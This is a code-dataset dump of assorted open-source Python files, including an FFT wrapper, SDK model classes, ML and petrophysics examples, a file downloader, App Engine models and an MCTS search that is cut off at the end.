max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 7
115
| max_stars_count
int64 101
368k
| id
stringlengths 2
8
| content
stringlengths 6
1.03M
|
---|---|---|---|---|
recipes/Python/576550_gsl_real_fft_in_python3/recipe-576550.py | tdiprima/code | 2,023 | 12747786 | '''
provide a simple python3 interface to the gsl_fft_real_transform function
'''
import sys
import itertools
from gsl_setup import *
def grouper(n, iterable, fillvalue=None):
# http://docs.python.org/dev/3.0/library/itertools.html#module-itertools
"grouper(3, 'ABCDEFG', 'x') --> ABC DEF Gxx"
args = [iter(iterable)] * n
return itertools.zip_longest(fillvalue=fillvalue, *args)
real_workspace_alloc = setup(
gsl.gsl_fft_real_workspace_alloc,[c_ulong,],c_void_p)
real_wavetable_alloc = setup(
gsl.gsl_fft_real_wavetable_alloc,[c_ulong,],c_void_p)
real_workspace_free =setup(gsl.gsl_fft_real_workspace_free ,[c_void_p,])
real_wavetable_free =setup(gsl.gsl_fft_real_wavetable_free ,[c_void_p,])
real_transform = setup(gsl.gsl_fft_real_transform,
[c_void_p,c_ulong,c_ulong,c_void_p,c_void_p],)
class Real_FFT:
'''
returns the complex values of the real transform of the real data.
return value[0] describes the offset,
[1] is amplitude of term for wavelength = data length
etceteras
[-1] amp of wavelength = twice sample distance
'''
def __init__(self):
self.n = 0
def __call__(self,data):
if len(data) < 2:
if 1 == len(data):
return data[:]
return []
if len(data) != self.n:
self.__del__()
self.n = len(data)
size = c_ulong(self.n)
self.workspace = real_workspace_alloc(size)
self.wavetable = real_wavetable_alloc(size)
a = array('d',data) # need a copy of the data
real_transform(ADDRESS(a),1,self.n,self.wavetable,self.workspace)
rv = [complex(a[0]),]
rv.extend(itertools.starmap(complex,grouper(2,a[1:],fillvalue=0)))
return rv
def __del__(self):
if self.n:
try:
real_workspace_free(self.workspace)
real_wavetable_free(self.wavetable)
except AttributeError:
print('Attribute error while freeing FFT auxiliary storage',
file=sys.stderr)
except:
print('error freeing FFT auxiliary storage',
file=sys.stderr)
def produce_frequency(self,*,samples=None,sample_interval=None,sample_rate=None,total_length=None):
'''
return the frequency grid based on actual sizes (default sample_interval=1).
'''
n = samples or self.n
if not n:
return array('d')
args_specified = 3 - ((not sample_interval)+(not sample_rate)+(not total_length))
if 1 < args_specified:
raise TypeError('specify at most one of [sample_rate, total_length, sample_interval]')
if 0 == args_specified:
L = n
elif sample_interval:
L = n*sample_interval
elif sample_rate:
L = n/sample_rate
else:
L = total_length
return as_array(waves/L for waves in range(1+n//2))
def produce_period(self,*args,**kwargs):
'''
return the period grid based on actual sizes.
frequency of zero --> period 0. what else to do?
'''
f2T = self.produce_frequency(*args,**kwargs)
for i in range(1,len(f2T)):
f2T[i] = 1/f2T[i]
return f2T
real_fft = Real_FFT()
def magnitude(a):
return [abs(b) for b in a]
def phase(a):
return [phase(b) for b in a]
|
alipay/aop/api/domain/QueryComplexLabelRule.py | snowxmas/alipay-sdk-python-all | 213 | 12747788 | <filename>alipay/aop/api/domain/QueryComplexLabelRule.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class QueryComplexLabelRule(object):
def __init__(self):
self._label_id = None
self._label_name = None
self._label_value = None
self._operator = None
@property
def label_id(self):
return self._label_id
@label_id.setter
def label_id(self, value):
self._label_id = value
@property
def label_name(self):
return self._label_name
@label_name.setter
def label_name(self, value):
self._label_name = value
@property
def label_value(self):
return self._label_value
@label_value.setter
def label_value(self, value):
self._label_value = value
@property
def operator(self):
return self._operator
@operator.setter
def operator(self, value):
self._operator = value
def to_alipay_dict(self):
params = dict()
if self.label_id:
if hasattr(self.label_id, 'to_alipay_dict'):
params['label_id'] = self.label_id.to_alipay_dict()
else:
params['label_id'] = self.label_id
if self.label_name:
if hasattr(self.label_name, 'to_alipay_dict'):
params['label_name'] = self.label_name.to_alipay_dict()
else:
params['label_name'] = self.label_name
if self.label_value:
if hasattr(self.label_value, 'to_alipay_dict'):
params['label_value'] = self.label_value.to_alipay_dict()
else:
params['label_value'] = self.label_value
if self.operator:
if hasattr(self.operator, 'to_alipay_dict'):
params['operator'] = self.operator.to_alipay_dict()
else:
params['operator'] = self.operator
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = QueryComplexLabelRule()
if 'label_id' in d:
o.label_id = d['label_id']
if 'label_name' in d:
o.label_name = d['label_name']
if 'label_value' in d:
o.label_value = d['label_value']
if 'operator' in d:
o.operator = d['operator']
return o
|
lib/_included_packages/plexnet/threadutils.py | aleenator/plex-for-kodi | 233 | 12747815 | <reponame>aleenator/plex-for-kodi
# import inspect
# import ctypes
from __future__ import absolute_import
import threading
# import time
# def _async_raise(tid, exctype):
# '''Raises an exception in the threads with id tid'''
# if not inspect.isclass(exctype):
# raise TypeError("Only types can be raised (not instances)")
# try:
# res = ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), ctypes.py_object(exctype))
# except AttributeError:
# # To catch: undefined symbol: PyThreadState_SetAsyncExc
# return
# if res == 0:
# raise ValueError("invalid thread id")
# elif res != 1:
# # "if it returns a number greater than one, you're in trouble,
# # and you should call it again with exc=NULL to revert the effect"
# ctypes.pythonapi.PyThreadState_SetAsyncExc(ctypes.c_long(tid), 0)
# raise SystemError("PyThreadState_SetAsyncExc failed")
# class KillThreadException(Exception):
# pass
class KillableThread(threading.Thread):
pass
'''A thread class that supports raising exception in the thread from
another thread.
'''
# def _get_my_tid(self):
# """determines this (self's) thread id
# CAREFUL : this function is executed in the context of the caller
# thread, to get the identity of the thread represented by this
# instance.
# """
# if not self.isAlive():
# raise threading.ThreadError("the thread is not active")
# return self.ident
# def _raiseExc(self, exctype):
# """Raises the given exception type in the context of this thread.
# If the thread is busy in a system call (time.sleep(),
# socket.accept(), ...), the exception is simply ignored.
# If you are sure that your exception should terminate the thread,
# one way to ensure that it works is:
# t = ThreadWithExc( ... )
# ...
# t.raiseExc( SomeException )
# while t.isAlive():
# time.sleep( 0.1 )
# t.raiseExc( SomeException )
# If the exception is to be caught by the thread, you need a way to
# check that your thread has caught it.
# CAREFUL : this function is executed in the context of the
# caller thread, to raise an excpetion in the context of the
# thread represented by this instance.
# """
# _async_raise(self._get_my_tid(), exctype)
def kill(self, force_and_wait=False):
pass
# try:
# self._raiseExc(KillThreadException)
# if force_and_wait:
# time.sleep(0.1)
# while self.isAlive():
# self._raiseExc(KillThreadException)
# time.sleep(0.1)
# except threading.ThreadError:
# pass
# def onKilled(self):
# pass
# def run(self):
# try:
# self._Thread__target(*self._Thread__args, **self._Thread__kwargs)
# except KillThreadException:
# self.onKilled()
|
examples/torchscript_resnet18_all_output_types.py | rdadolf/torch-mlir | 213 | 12747828 | # Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
# See https://llvm.org/LICENSE.txt for license information.
# SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
# Also available under a BSD-style license. See LICENSE.
import torch
import torchvision
import torch_mlir
resnet18 = torchvision.models.resnet18(pretrained=True)
resnet18.eval()
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TORCH)
print("TORCH OutputType\n", module.operation.get_asm(large_elements_limit=10))
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.LINALG_ON_TENSORS)
print("LINALG_ON_TENSORS OutputType\n", module.operation.get_asm(large_elements_limit=10))
# TODO: Debug why this is so slow.
module = torch_mlir.compile(resnet18, torch.ones(1, 3, 224, 224), output_type=torch_mlir.OutputType.TOSA)
print("TOSA OutputType\n", module.operation.get_asm(large_elements_limit=10))
|
examples/wolfcamp_single.py | SPWLA-ORG/PetroPy | 145 | 12747868 | <filename>examples/wolfcamp_single.py
"""
==================================
Wolfcamp Example - Single las file
==================================
This example shows the full petrophysical workflow avaiable in PetroPy
for a single wolfcamp las file courtesy of University Lands Texas.
The workflow progresses in these 11 steps
1. Read las file and create a :class:`petropy.Log` object
2. Load tops from a csv file using :meth:`petropy.Log.tops_from_csv`
3. Create a :class:`petropy.LogViewer` show in edit_mode to fix data
4. Define formations for calculations.
5. Calculate fluid properties by
1. Loading parameters via :meth:`petropy.Log.fluid_properties_parameters_from_csv`
2. Calculating over formations via :meth:`petropy.Log.formation_fluid_properties`
6. Calculate mulitmineral properties by
1. Loading parameters via :meth:`petropy.Log.multimineral_parameters_from_csv`
2. Calculating over formations via :meth:`petropy.Log.formation_multimineral_model`
7. Curve summations via :meth:`petropy.Log.summations`
8. Adding pay flags via :meth:`petropy.Log.add_pay_flag`
9. Clustering intervals into Electrofacies via :meth:`petropy.electrofacies`
10. Exporting log statistics via :meth:`petropy.Log.statistics`
11. Saving LogViewer to png and Log to las
To bulk process a folder of las files at once, use the `bulk example`_ .
Downloading the script at the bottom of this webpage will not download the required las
file or PetroPy logo. To download all files, view the `examples folder`_ on GitHub.
.. _bulk example: wolfcamp_bulk.html
.. _examples folder: https://github.com/toddheitmann/PetroPy/tree/master/examples
"""
import petropy as ptr
# import pyplot to add logo to figure
import matplotlib.pyplot as plt
### 1. Read las file
# create a Log object by reading a file path #
las_file_path = '42303347740000.las'
log = ptr.Log(las_file_path)
### 2. load tops ###
tops_file_path = 'tops.csv'
log.tops_from_csv(tops_file_path)
### 3. graphically edit log ###
# use manual mode for fixing borehole washout #
# and other changes requiring redrawing data #
# use bulk shift mode to linearly adjust all #
# curve data #
# close both windows to continue program #
viewer = ptr.LogViewer(log, top = 6950, height = 100)
viewer.show(edit_mode = True)
# overwrite log variable with updated log #
# from LogViewer edits #
log = viewer.log
### 4. define formations ###
f = ['WFMPA', 'WFMPB', 'WFMPC']
### 5. fluid properties ###
# load fluid properties from a csv file #
# since path is not specified, load default #
# csv file included with petropy #
log.fluid_properties_parameters_from_csv()
# calculate fluid properties over defined #
# formations with parameter WFMP from #
# previously loaded csv #
log.formation_fluid_properties(f, parameter = 'WFMP')
### 6. multimineral model ###
# load multimineral parameters from csv file #
# since path is not specified, load default #
# csv file included with petropy #
log.multimineral_parameters_from_csv()
# calculate multiminearl model over defined #
# formations with parameter WFMP from #
# previously loaded csv #
log.formation_multimineral_model(f, parameter = 'WFMP')
### 7. summations ###
# define curves to calculate cumulative values #
c = ['OIP', 'BVH', 'PHIE']
# calculate cumulative values over formations #
log.summations(f, curves = c)
### 8. pay flags ###
# define pay flogs as list of tuples for #
# (curve, value) #
flag_1_gtoe = [('PHIE', 0.03)]
flag_2_gtoe = [('PAY_FLAG_1', 1), ('BVH', 0.02)]
flag_3_gtoe = [('PAY_FLAG_2', 1)]
flag_3_ltoe = [('SW', 0.2)]
# add pay flags over defined formations #
log.add_pay_flag(f, greater_than_or_equal = flag_1_gtoe)
log.add_pay_flag(f, greater_than_or_equal = flag_2_gtoe)
log.add_pay_flag(f, greater_than_or_equal = flag_3_gtoe,
less_than_or_equal = flag_3_ltoe)
### 9. electrofacies ###
# define curves to use in electofaceis module #
electro_logs = ['GR_N', 'RESDEEP_N', 'NPHI_N', 'RHOB_N', 'PE_N']
# make a list of Log objects as input #
logs = [log]
# calculate electrofacies for the defined logs#
# over the specified formations #
# finding 6 clusters of electrofacies #
# with RESDEEP_N logarithmically scaled #
logs = ptr.electrofacies(logs, f, electro_logs, 6,
log_scale = ['RESDEEP_N'])
# unpack log object from returned list #
log = logs[0]
### 10. statistics ###
# define list of curves to find statistics #
stats_curves = ['OIP', 'BVH', 'PHIE', 'SW', 'VCLAY', 'TOC']
# calculate stats over specified formation and#
# save to csv file wfmp_statistics.csv #
# update the line if the well, formation is #
# already included in the csv file #
log.statistics_to_csv('wfmp_statistics.csv', replace = True,
formations = f, curves = stats_curves,
pay_flags = pay_flags, facies = facies_curves)
### 11. export data ###
# find way to name well, looking for well name#
# or UWI or API #
if len(log.well['WELL'].value) > 0:
well_name = log.well['WELL'].value
elif len(str(log.well['UWI'].value)) > 0:
well_name = str(log.well['UWI'].value)
elif len(log.well['API'].value) > 0:
well_name = str(log.well['API'].value)
else:
well_name = 'UNKNOWN'
well_name = well_name.replace('.', '')
# scale height of viewer to top and bottom #
# of calculated values #
wfmpa_top = log.tops['WFMPA']
wfmpc_base = log.next_formation_depth('WFMPC')
top = wfmpa_top
height = wfmpc_base - wfmpa_top
# create LogViewer with the default full_oil #
# template included in petropy #
viewer = ptr.LogViewer(log, top = top, height = height,
template_defaults = 'full_oil')
# set viewer to 17x11 inches size for use in #
# PowerPoint or printing to larger paper #
viewer.fig.set_size_inches(17, 11)
# add well_name to title of LogViewer #
viewer.fig.suptitle(well_name, fontweight = 'bold', fontsize = 30)
# add logo to top left corner #
logo_im = plt.imread('company_logo.png')
logo_ax = viewer.fig.add_axes([0, 0.85, 0.2, 0.2])
logo_ax.imshow(logo_im)
logo_ax.axis('off')
# add text to top right corner #
if len(str(log.well['UWI'].value)) > 0:
label = 'UWI: ' + str(log.well['UWI'].value) + '\n'
elif len(log.well['API'].value) > 0:
label = 'API: ' + str(log.well['API'].value) + '\n'
else:
label = ''
label += 'County: Reagan\nCreated By: <NAME>\n'
label += 'Creation Date: October 23, 2017'
viewer.axes[0].annotate(label, xy = (0.99,0.99),
xycoords = 'figure fraction',
horizontalalignment = 'right',
verticalalignment = 'top',
fontsize = 14)
# save figure and log #
viewer_file_name=r'%s_processed.png' % well_name
las_file_name = r'%s_processed.las' % well_name
viewer.fig.savefig(viewer_file_name)
viewer.log.write(las_file_name)
|
homeassistant/components/rpi_power/const.py | tbarbette/core | 30,023 | 12747870 | """Constants for Raspberry Pi Power Supply Checker."""
DOMAIN = "rpi_power"
|
podman/tests/unit/test_manifests.py | kevinwylder/podman-py | 106 | 12747879 | <reponame>kevinwylder/podman-py<filename>podman/tests/unit/test_manifests.py
import unittest
from podman import PodmanClient, tests
from podman.domain.manifests import ManifestsManager, Manifest
class ManifestTestCase(unittest.TestCase):
def setUp(self) -> None:
super().setUp()
self.client = PodmanClient(base_url=tests.BASE_SOCK)
def tearDown(self) -> None:
super().tearDown()
self.client.close()
def test_podmanclient(self):
manager = self.client.manifests
self.assertIsInstance(manager, ManifestsManager)
def test_list(self):
with self.assertRaises(NotImplementedError):
self.client.manifests.list()
def test_name(self):
with self.assertRaises(ValueError):
manifest = Manifest(attrs={"names": ""})
_ = manifest.name
with self.assertRaises(ValueError):
manifest = Manifest()
_ = manifest.name
if __name__ == '__main__':
unittest.main()
|
examples.py | pauloromeira/onegram | 150 | 12747894 | <reponame>pauloromeira/onegram
#!/usr/bin/env python
from operator import itemgetter
from itertools import islice
from collections import defaultdict
from onegram import Login, login, logout
# Queries
from onegram import user_info, post_info
from onegram import followers, following
from onegram import posts, likes, comments, feed
from onegram import explore
# Actions
from onegram import follow, unfollow
from onegram import like, unlike
from onegram import comment, uncomment
from onegram import save, unsave
def likers_rank(user=None):
rank = defaultdict(int)
for post in posts(user):
for like in likes(post):
username = like['username']
rank[username] += 1
return sorted(rank.items(), key=itemgetter(1), reverse=True)
def commenters_rank(user=None):
rank = defaultdict(int)
for post in posts(user):
for commentary in comments(post):
username = commentary['owner']['username']
rank[username] += 1
return sorted(rank.items(), key=itemgetter(1), reverse=True)
p = next(posts('other'))
like(p)
unlike(p)
|
client/verta/tests/bases/test_deployable_entity.py | benshaw/modeldb | 835 | 12747922 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
import hashlib
import string
import tempfile
import hypothesis
import hypothesis.strategies as st
import six
from verta._protos.public.common import CommonService_pb2
from verta._internal_utils import _artifact_utils
from verta.tracking.entities._deployable_entity import _DeployableEntity
class TestBuildArtifactStorePath:
@hypothesis.example(
artifact_bytes=b"foo",
key="my_artifact",
ext="pkl",
)
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(st.characters(blacklist_characters="."), min_size=1),
ext=st.text(st.characters(blacklist_characters="."), min_size=1),
)
def test_with_ext(self, artifact_bytes, key, ext):
checksum = hashlib.sha256(artifact_bytes).hexdigest()
filename = key + "." + ext
expected_path = checksum + "/" + filename
artifact_path = _DeployableEntity._build_artifact_store_path(
artifact_stream=six.BytesIO(artifact_bytes),
key=key,
ext=ext,
)
assert artifact_path == expected_path
@hypothesis.example(artifact_bytes=b"foo", key="model")
@hypothesis.example(artifact_bytes=b"foo", key="model_api.json")
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(min_size=1),
)
def test_no_ext(self, artifact_bytes, key):
checksum = hashlib.sha256(artifact_bytes).hexdigest()
filename = key
expected_path = checksum + "/" + filename
artifact_path = _DeployableEntity._build_artifact_store_path(
artifact_stream=six.BytesIO(artifact_bytes),
key=key,
)
assert artifact_path == expected_path
class TestCreateArtifactMsg:
@hypothesis.given(
artifact_bytes=st.binary(min_size=1),
key=st.text(
st.characters(
blacklist_categories=("Cs",), # invalid UTF-8
blacklist_characters=".",
),
min_size=1,
),
ext=st.text(
st.characters(
whitelist_categories=("Lu", "Ll", "Nd"), # alphanumeric
),
min_size=1,
),
artifact_type=st.sampled_from(
CommonService_pb2.ArtifactTypeEnum.ArtifactType.values(),
),
method=st.text(min_size=1),
framework=st.text(min_size=1),
)
def test_with_ext(
self,
artifact_bytes,
key,
ext,
artifact_type,
method,
framework,
):
with tempfile.NamedTemporaryFile(suffix="." + ext) as tempf:
tempf.write(artifact_bytes)
tempf.seek(0)
artifact_msg = _DeployableEntity._create_artifact_msg(
key,
tempf,
artifact_type,
method,
framework,
# no explicit extension
)
checksum = hashlib.sha256(artifact_bytes).hexdigest()
artifact_path = checksum + "/" + key + "." + ext
assert artifact_msg == CommonService_pb2.Artifact(
key=key,
path=artifact_path,
path_only=False,
artifact_type=artifact_type,
filename_extension=ext,
serialization=method,
artifact_subtype=framework,
)
|
vedacore/parallel/_functions.py | jie311/vedadet | 424 | 12747926 | <reponame>jie311/vedadet
# Copyright (c) Open-MMLab. All rights reserved.
import torch
from torch.nn.parallel._functions import _get_stream
def scatter(input, devices, streams=None):
"""Scatters tensor across multiple GPUs.
"""
if streams is None:
streams = [None] * len(devices)
if isinstance(input, list):
chunk_size = (len(input) - 1) // len(devices) + 1
outputs = [
scatter(input[i], [devices[i // chunk_size]],
[streams[i // chunk_size]]) for i in range(len(input))
]
return outputs
elif isinstance(input, torch.Tensor):
output = input.contiguous()
# TODO: copy to a pinned buffer first (if copying from CPU)
stream = streams[0] if output.numel() > 0 else None
with torch.cuda.device(devices[0]), torch.cuda.stream(stream):
output = output.cuda(devices[0], non_blocking=True)
return output
else:
raise Exception(f'Unknown type {type(input)}.')
def synchronize_stream(output, devices, streams):
if isinstance(output, list):
chunk_size = len(output) // len(devices)
for i in range(len(devices)):
for j in range(chunk_size):
synchronize_stream(output[i * chunk_size + j], [devices[i]],
[streams[i]])
elif isinstance(output, torch.Tensor):
if output.numel() != 0:
with torch.cuda.device(devices[0]):
main_stream = torch.cuda.current_stream()
main_stream.wait_stream(streams[0])
output.record_stream(main_stream)
else:
raise Exception(f'Unknown type {type(output)}.')
def get_input_device(input):
if isinstance(input, list):
for item in input:
input_device = get_input_device(item)
if input_device != -1:
return input_device
return -1
elif isinstance(input, torch.Tensor):
return input.get_device() if input.is_cuda else -1
else:
raise Exception(f'Unknown type {type(input)}.')
class Scatter:
@staticmethod
def forward(target_gpus, input):
input_device = get_input_device(input)
streams = None
if input_device == -1:
# Perform CPU to GPU copies in a background stream
streams = [_get_stream(device) for device in target_gpus]
outputs = scatter(input, target_gpus, streams)
# Synchronize with the copy stream
if streams is not None:
synchronize_stream(outputs, target_gpus, streams)
return tuple(outputs)
|
tests/unit/cli/test_archives.py | tehlingchu/anchore-cli | 110 | 12747934 | from anchorecli.cli import archives
|
Whole-App-Acceleration/apps/resnet50/build_flow/DPUCADF8H_u200/scripts/utility/readme_gen/gs_summary_subdir.py | hito0512/Vitis-AI | 848 | 12747975 | <reponame>hito0512/Vitis-AI<filename>Whole-App-Acceleration/apps/resnet50/build_flow/DPUCADF8H_u200/scripts/utility/readme_gen/gs_summary_subdir.py
#!/usr/bin/env python
import os, re
import fnmatch
import json
import sys
sys.path.append(".")
import gs_summary_util
gs_summary_util.genReadMe2(".")
|
r2l/rerank.py | thilakshiK/wmt16-scripts | 132 | 12747982 | <reponame>thilakshiK/wmt16-scripts<gh_stars>100-1000
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Author: <NAME>
# Distributed under MIT license
import sys
from collections import defaultdict
if __name__ == '__main__':
if len(sys.argv) > 1:
k = int(sys.argv[1])
else:
k = float('inf')
cur = 0
best_score = float('inf')
best_sent = ''
idx = 0
for line in sys.stdin:
num, sent, scores = line.split(' ||| ')
# new input sentence: print best translation of previous sentence, and reset stats
if int(num) > cur:
print best_sent
#print best_score
cur = int(num)
best_score = float('inf')
best_sent = ''
idx = 0
#only consider k-best hypotheses
if idx >= k:
continue
score = sum(map(float, scores.split()))
if score < best_score:
best_score = score
best_sent = sent.strip()
idx += 1
# end of file; print best translation of last sentence
print best_sent
# print best_score
|
demo.py | dmis-lab/BioSyn | 114 | 12747993 | <reponame>dmis-lab/BioSyn
import argparse
import os
import pdb
import pickle
import tornado.web
import tornado.ioloop
import tornado.autoreload
import logging
import json
from src.biosyn import (
DictionaryDataset,
BioSyn,
TextPreprocess
)
logging.basicConfig(
filename='.server.log',
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO
)
parser = argparse.ArgumentParser(description='BioSyn Demo')
# Required
parser.add_argument('--model_name_or_path', required=True, help='Directory for model')
# Settings
parser.add_argument('--port', type=int, default=8888, help='port number')
parser.add_argument('--show_predictions', action="store_true")
parser.add_argument('--dictionary_path', type=str, default=None, help='dictionary path')
parser.add_argument('--use_cuda', action="store_true")
args = parser.parse_args()
def cache_or_load_dictionary():
dictionary_name = os.path.splitext(os.path.basename(args.dictionary_path))[0]
cached_dictionary_path = os.path.join(
'./tmp',
"cached_{}.pk".format(dictionary_name)
)
# If exist, load the cached dictionary
if os.path.exists(cached_dictionary_path):
with open(cached_dictionary_path, 'rb') as fin:
cached_dictionary = pickle.load(fin)
print("Loaded dictionary from cached file {}".format(cached_dictionary_path))
dictionary, dict_sparse_embeds, dict_dense_embeds = (
cached_dictionary['dictionary'],
cached_dictionary['dict_sparse_embeds'],
cached_dictionary['dict_dense_embeds'],
)
else:
dictionary = DictionaryDataset(dictionary_path = args.dictionary_path).data
dictionary_names = dictionary[:,0]
dict_sparse_embeds = biosyn.embed_sparse(names=dictionary_names, show_progress=True)
dict_dense_embeds = biosyn.embed_dense(names=dictionary_names, show_progress=True)
cached_dictionary = {
'dictionary': dictionary,
'dict_sparse_embeds' : dict_sparse_embeds,
'dict_dense_embeds' : dict_dense_embeds
}
if not os.path.exists('./tmp'):
os.mkdir('./tmp')
with open(cached_dictionary_path, 'wb') as fin:
pickle.dump(cached_dictionary, fin)
print("Saving dictionary into cached file {}".format(cached_dictionary_path))
return dictionary, dict_sparse_embeds, dict_dense_embeds
def normalize(mention):
# preprocess mention
mention = TextPreprocess().run(mention)
# embed mention
mention_sparse_embeds = biosyn.embed_sparse(names=[mention])
mention_dense_embeds = biosyn.embed_dense(names=[mention])
# calcuate score matrix and get top 1
sparse_score_matrix = biosyn.get_score_matrix(
query_embeds=mention_sparse_embeds,
dict_embeds=dict_sparse_embeds
)
dense_score_matrix = biosyn.get_score_matrix(
query_embeds=mention_dense_embeds,
dict_embeds=dict_dense_embeds
)
sparse_weight = biosyn.get_sparse_weight().item()
hybrid_score_matrix = sparse_weight * sparse_score_matrix + dense_score_matrix
hybrid_candidate_idxs = biosyn.retrieve_candidate(
score_matrix = hybrid_score_matrix,
topk = 10
)
# get predictions from dictionary
predictions = dictionary[hybrid_candidate_idxs].squeeze(0)
output = {
'predictions' : []
}
for prediction in predictions:
predicted_name = prediction[0]
predicted_id = prediction[1]
output['predictions'].append({
'name': predicted_name,
'id': predicted_id
})
return output
# load biosyn model
biosyn = BioSyn(
use_cuda=args.use_cuda,
max_length=25
)
biosyn.load_model(
model_name_or_path=args.model_name_or_path
)
# cache or load dictionary
dictionary, dict_sparse_embeds, dict_dense_embeds = cache_or_load_dictionary()
class MainHandler(tornado.web.RequestHandler):
def get(self):
self.render("./template/index.html")
class NormalizeHandler(tornado.web.RequestHandler):
def get(self):
string = self.get_argument('string', '')
logging.info('get!{}'.format({
'string':string,
}))
self.set_header("Content-Type", "application/json")
output = normalize(mention=string)
self.write(json.dumps(output))
def make_app():
settings={
'debug':True
}
return tornado.web.Application([
(r"/", MainHandler),
(r"/normalize/", NormalizeHandler),
(r'/semantic/(.*)', tornado.web.StaticFileHandler, {'path': './semantic'}),
(r'/images/(.*)', tornado.web.StaticFileHandler, {'path': './images'}),
],**settings)
if __name__ == '__main__':
logging.info('Starting biosyn server at http://localhost:{}'.format(args.port))
app = make_app()
app.listen(args.port)
tornado.ioloop.IOLoop.current().start() |
lib/PyAMF-0.6.1/pyamf/tests/adapters/_google_models.py | MiCHiLU/google_appengine_sdk | 790 | 12748003 | <reponame>MiCHiLU/google_appengine_sdk
from google.appengine.ext import db
class PetModel(db.Model):
"""
"""
# 'borrowed' from http://code.google.com/appengine/docs/datastore/entitiesandmodels.html
name = db.StringProperty(required=True)
type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"]))
birthdate = db.DateProperty()
weight_in_pounds = db.IntegerProperty()
spayed_or_neutered = db.BooleanProperty()
class PetExpando(db.Expando):
"""
"""
name = db.StringProperty(required=True)
type = db.StringProperty(required=True, choices=set(["cat", "dog", "bird"]))
birthdate = db.DateProperty()
weight_in_pounds = db.IntegerProperty()
spayed_or_neutered = db.BooleanProperty()
class ListModel(db.Model):
"""
"""
numbers = db.ListProperty(long)
class GettableModelStub(db.Model):
"""
"""
gets = []
@staticmethod
def get(*args, **kwargs):
GettableModelStub.gets.append([args, kwargs])
class Author(db.Model):
name = db.StringProperty()
class Novel(db.Model):
title = db.StringProperty()
author = db.ReferenceProperty(Author)
class EmptyModel(db.Model):
"""
A model that has no properties but also has no entities in the datastore.
"""
|
general/file-downloader/download.py | caesarcc/python-code-tutorials | 1,059 | 12748020 | <filename>general/file-downloader/download.py<gh_stars>1000+
from tqdm import tqdm
import requests
import cgi
import sys
# the url of file you want to download, passed from command line arguments
url = sys.argv[1]
# read 1024 bytes every time
buffer_size = 1024
# download the body of response by chunk, not immediately
response = requests.get(url, stream=True)
# get the total file size
file_size = int(response.headers.get("Content-Length", 0))
# get the default filename
default_filename = url.split("/")[-1]
# get the content disposition header
content_disposition = response.headers.get("Content-Disposition")
if content_disposition:
# parse the header using cgi
value, params = cgi.parse_header(content_disposition)
# extract filename from content disposition
filename = params.get("filename", default_filename)
else:
# if content dispotion is not available, just use default from URL
filename = default_filename
# progress bar, changing the unit to bytes instead of iteration (default by tqdm)
progress = tqdm(response.iter_content(buffer_size), f"Downloading {filename}", total=file_size, unit="B", unit_scale=True, unit_divisor=1024)
with open(filename, "wb") as f:
for data in progress.iterable:
# write data read to the file
f.write(data)
# update the progress bar manually
progress.update(len(data)) |
examples/design_search/mcts.py | ONLYA/RoboGrammar | 156 | 12748028 | <filename>examples/design_search/mcts.py
from collections import defaultdict
from math import log, sqrt
import random
class TreeNode(object):
def __init__(self, state):
self.state = state
self.visit_count = 0
self.result_sum = 0
self.result_max = float('-inf')
self.action_visit_counts = defaultdict(int)
self.action_result_sums = defaultdict(float)
self.action_result_maxes = defaultdict(lambda: float('-inf'))
self.amaf_action_visit_counts = defaultdict(int)
self.amaf_action_result_sums = defaultdict(float)
self.amaf_action_result_maxes = defaultdict(lambda: float('-inf'))
self.blocked = False
class TreeSearch(object):
def __init__(self, env, max_tries, default_policy=None):
self.env = env
self.max_tries = max_tries
self.nodes = dict() # Mapping from state keys to nodes
self.nodes[env.get_key(env.initial_state)] = TreeNode(env.initial_state)
self.default_policy = default_policy
def uct_score(self, node, action, amaf_threshold=10):
action_visit_count = node.action_visit_counts[action]
action_result_max = node.action_result_maxes[action]
amaf_action_visit_count = node.amaf_action_visit_counts[action]
amaf_action_result_max = node.amaf_action_result_maxes[action]
# AMAF and Monte Carlo values are weighted equally when the visit count is
# amaf_threshold
amaf_weight = sqrt(amaf_threshold / (3 * node.visit_count + amaf_threshold))
if action_visit_count > 0:
return ((1.0 - amaf_weight) * action_result_max +
amaf_weight * amaf_action_result_max +
sqrt(2.0 * log(node.visit_count) / action_visit_count))
else:
return float('inf')
def select_action(self, state):
available_actions = list()
# Filter out actions leading to blocked nodes
for action in self.env.get_available_actions(state):
next_state = self.env.get_next_state(state, action)
next_state_key = self.env.get_key(next_state)
if (next_state_key not in self.nodes or
not self.nodes[next_state_key].blocked):
available_actions.append(action)
if available_actions:
try:
# Follow tree policy
node = self.nodes[self.env.get_key(state)]
return max(available_actions,
key=lambda action: self.uct_score(node, action))
except KeyError:
# State was not visited yet, follow default policy
if self.default_policy is not None:
return self.default_policy(state, available_actions)
else:
return random.choice(available_actions)
else:
return None
def update_node(self, node, actions_after, result):
node.visit_count += 1
node.result_sum += result
node.result_max = max(node.result_max, result)
node.action_visit_counts[actions_after[0]] += 1
node.action_result_sums[actions_after[0]] += result
node.action_result_maxes[actions_after[0]] = \
max(node.action_result_maxes[actions_after[0]], result)
# Update AMAF values (once for each unique action)
for action in set(actions_after):
node.amaf_action_visit_counts[action] += 1
node.amaf_action_result_sums[action] += result
node.amaf_action_result_maxes[action] = \
max(node.amaf_action_result_maxes[action], result)
def run_iteration(self):
result = None
while result is None:
# Selection phase
states = [self.env.initial_state]
actions = []
action = self.select_action(states[-1])
while action is not None and self.env.get_key(states[-1]) in self.nodes:
states.append(self.env.get_next_state(states[-1], action))
actions.append(action)
action = self.select_action(states[-1])
# Expansion phase
last_state_key = self.env.get_key(states[-1])
